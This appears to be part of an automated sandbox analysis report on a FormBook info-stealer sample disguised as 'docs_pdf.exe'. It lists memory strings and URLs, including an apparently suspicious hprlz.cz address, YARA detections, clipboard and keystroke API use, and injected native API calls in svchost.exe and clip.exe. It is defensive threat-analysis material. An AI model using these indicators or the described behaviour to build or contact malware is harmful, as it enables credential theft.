            Source: clip.exe, 00000003.00000002.2913704315.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: clip.exe, 00000003.00000002.2913704315.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: clip.exe, 00000003.00000002.2913704315.0000000002B96000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.2913704315.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: clip.exe, 00000003.00000002.2913704315.0000000002B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: clip.exe, 00000003.00000003.2014233136.0000000007BE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-114.png
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-57.png
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/images/iOS-72.png
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/responsive/styles/reset.css
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/images/additional-pages-hero-shape.webp
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/logo/logo-loopia-white.svg
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.loopia.se/shared/style/2022-extra-pages.css
            Source: clip.exe, 00000003.00000002.2917722091.0000000007C0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtm.js?id=
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html?id=GTM-NP3MFSK
            Source: clip.exe, 00000003.00000002.2916160322.0000000005264000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000002E54000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2121303941.0000000005D34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hprlz.cz/w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&amp;tDA=0lpTRQcDUH
            Source: clip.exe, 00000003.00000002.2916160322.0000000005264000.00000004.10000000.00040000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000002E54000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2121303941.0000000005D34000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.hprlz.cz/w6qg/?Y2AhR=fDNdZPHH1hsp8rrp&tDA=0lpTRQcDUH
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park
            Source: clip.exe, 00000003.00000002.2916160322.0000000005D62000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.2917578527.00000000078F0000.00000004.00000800.00020000.00000000.sdmp, qsWkdNJOHuxNQUCXoUm.exe, 00000007.00000002.2915456645.0000000003952000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0102425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0102425A
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01024458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_01024458
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0102425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0102425A
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01010219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_01010219
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0103CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0103CDAC

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1842966227.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2915212767.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1843022477.0000000004B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2915081115.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2913469899.0000000002780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1842290329.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2915275774.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2916711467.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1842966227.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2915212767.00000000045F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1843022477.0000000004B90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.2915081115.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2913469899.0000000002780000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1842290329.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.2915275774.0000000004630000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.2916711467.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: This is a third-party compiled AutoIt script.0_2_00FB3B4C
            Source: docs_pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: docs_pdf.exe, 00000000.00000000.1661626632.0000000001065000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_db17d7e8-1
            Source: docs_pdf.exe, 00000000.00000000.1661626632.0000000001065000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_156f4d24-5
            Source: docs_pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_cdddda69-0
            Source: docs_pdf.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_a38f168d-4
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: docs_pdf.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042AFF3 NtClose,1_2_0042AFF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472B60 NtClose,LdrInitializeThunk,1_2_03472B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03472DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03472C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034735C0 NtCreateMutant,LdrInitializeThunk,1_2_034735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03474340 NtSetContextThread,1_2_03474340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03474650 NtSuspendThread,1_2_03474650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472BE0 NtQueryValueKey,1_2_03472BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472BF0 NtAllocateVirtualMemory,1_2_03472BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472B80 NtQueryInformationFile,1_2_03472B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472BA0 NtEnumerateValueKey,1_2_03472BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472AD0 NtReadFile,1_2_03472AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472AF0 NtWriteFile,1_2_03472AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472AB0 NtWaitForSingleObject,1_2_03472AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472F60 NtCreateProcessEx,1_2_03472F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472F30 NtCreateSection,1_2_03472F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472FE0 NtCreateFile,1_2_03472FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472F90 NtProtectVirtualMemory,1_2_03472F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472FA0 NtQuerySection,1_2_03472FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472FB0 NtResumeThread,1_2_03472FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472E30 NtWriteVirtualMemory,1_2_03472E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472EE0 NtQueueApcThread,1_2_03472EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472E80 NtReadVirtualMemory,1_2_03472E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472EA0 NtAdjustPrivilegesToken,1_2_03472EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472D00 NtSetInformationFile,1_2_03472D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472D10 NtMapViewOfSection,1_2_03472D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472D30 NtUnmapViewOfSection,1_2_03472D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472DD0 NtDelayExecution,1_2_03472DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472DB0 NtEnumerateKey,1_2_03472DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472C60 NtCreateKey,1_2_03472C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472C00 NtQueryInformationProcess,1_2_03472C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472CC0 NtQueryVirtualMemory,1_2_03472CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472CF0 NtOpenProcess,1_2_03472CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472CA0 NtQueryInformationToken,1_2_03472CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473010 NtOpenDirectoryObject,1_2_03473010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473090 NtSetValueKey,1_2_03473090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034739B0 NtGetContextThread,1_2_034739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473D70 NtOpenThread,1_2_03473D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473D10 NtOpenProcessToken,1_2_03473D10
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C4650 NtSuspendThread,LdrInitializeThunk,3_2_048C4650
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C4340 NtSetContextThread,LdrInitializeThunk,3_2_048C4340
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_048C2CA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2C60 NtCreateKey,LdrInitializeThunk,3_2_048C2C60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_048C2C70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2DD0 NtDelayExecution,LdrInitializeThunk,3_2_048C2DD0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_048C2DF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_048C2D10
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_048C2D30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_048C2E80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2EE0 NtQueueApcThread,LdrInitializeThunk,3_2_048C2EE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2FB0 NtResumeThread,LdrInitializeThunk,3_2_048C2FB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2FE0 NtCreateFile,LdrInitializeThunk,3_2_048C2FE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2F30 NtCreateSection,LdrInitializeThunk,3_2_048C2F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2AD0 NtReadFile,LdrInitializeThunk,3_2_048C2AD0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2AF0 NtWriteFile,LdrInitializeThunk,3_2_048C2AF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_048C2BA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2BE0 NtQueryValueKey,LdrInitializeThunk,3_2_048C2BE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_048C2BF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2B60 NtClose,LdrInitializeThunk,3_2_048C2B60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C35C0 NtCreateMutant,LdrInitializeThunk,3_2_048C35C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C39B0 NtGetContextThread,LdrInitializeThunk,3_2_048C39B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2CC0 NtQueryVirtualMemory,3_2_048C2CC0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2CF0 NtOpenProcess,3_2_048C2CF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2C00 NtQueryInformationProcess,3_2_048C2C00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2DB0 NtEnumerateKey,3_2_048C2DB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2D00 NtSetInformationFile,3_2_048C2D00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2EA0 NtAdjustPrivilegesToken,3_2_048C2EA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2E30 NtWriteVirtualMemory,3_2_048C2E30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2F90 NtProtectVirtualMemory,3_2_048C2F90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2FA0 NtQuerySection,3_2_048C2FA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2F60 NtCreateProcessEx,3_2_048C2F60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2AB0 NtWaitForSingleObject,3_2_048C2AB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C2B80 NtQueryInformationFile,3_2_048C2B80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C3090 NtSetValueKey,3_2_048C3090
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C3010 NtOpenDirectoryObject,3_2_048C3010
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C3D10 NtOpenProcessToken,3_2_048C3D10
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_048C3D70 NtOpenThread,3_2_048C3D70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_027A7B40 NtCreateFile,3_2_027A7B40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_027A7E30 NtClose,3_2_027A7E30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_027A7F90 NtAllocateVirtualMemory,3_2_027A7F90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_027A7CA0 NtReadFile,3_2_027A7CA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_027A7D90 NtDeleteFile,3_2_027A7D90
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01014021: CreateFileW,DeviceIoControl,CloseHandle,0_2_01014021
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01008858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_01008858
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0101545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_0101545F
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FBE8000_2_00FBE800
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FDDBB50_2_00FDDBB5
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FBE0600_2_00FBE060
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0103804A0_2_0103804A
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FC41400_2_00FC4140
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FD24050_2_00FD2405
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FE65220_2_00FE6522
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FE267E0_2_00FE267E
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_010306650_2_01030665
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FC68430_2_00FC6843
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FD283A0_2_00FD283A
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_00FE89DF0_2_00FE89DF
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_0100EB070_2_0100EB07
            Source: C:\Users\user\Desktop\docs_pdf.exeCode function: 0_2_01018B130_2_01018B13
